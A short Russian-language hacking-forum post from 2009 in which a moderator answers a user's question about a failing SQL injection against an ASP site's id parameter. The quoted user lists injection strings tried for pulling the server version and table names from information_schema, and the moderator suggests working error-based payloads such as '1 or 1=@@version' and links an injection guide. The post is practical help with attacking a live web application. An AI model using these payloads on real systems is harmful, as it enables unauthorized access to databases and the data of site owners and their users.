Показать сообщение отдельно

  #9  
Старый 07.08.2009, 10:57
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Damnating  
site.com/request_list.asp?action=view&id=111814+and+1=(sele ct+@@version
но при

site.com/request_list.asp?action=view&id=111814+or+1=(selec t+top+1+table_name+from+information_schema.tables)--
ругается а-ля

Incorrect syntax near the keyword 'from'.


при union select верном пишет Incorrect syntax near '@@version'.


перегуглил все интернеты, нигде не нашел вразумительного ответа, обходы /**/, %20 и прочее не пашет, подскажите а?
1' or 1=@@version
или
1 or 1=@@version

http://injection.rulezz.ru/MSSQL-Injection.html
На почитай.

Последний раз редактировалось Ctacok; 07.08.2009 в 10:59..
 
Ответить с цитированием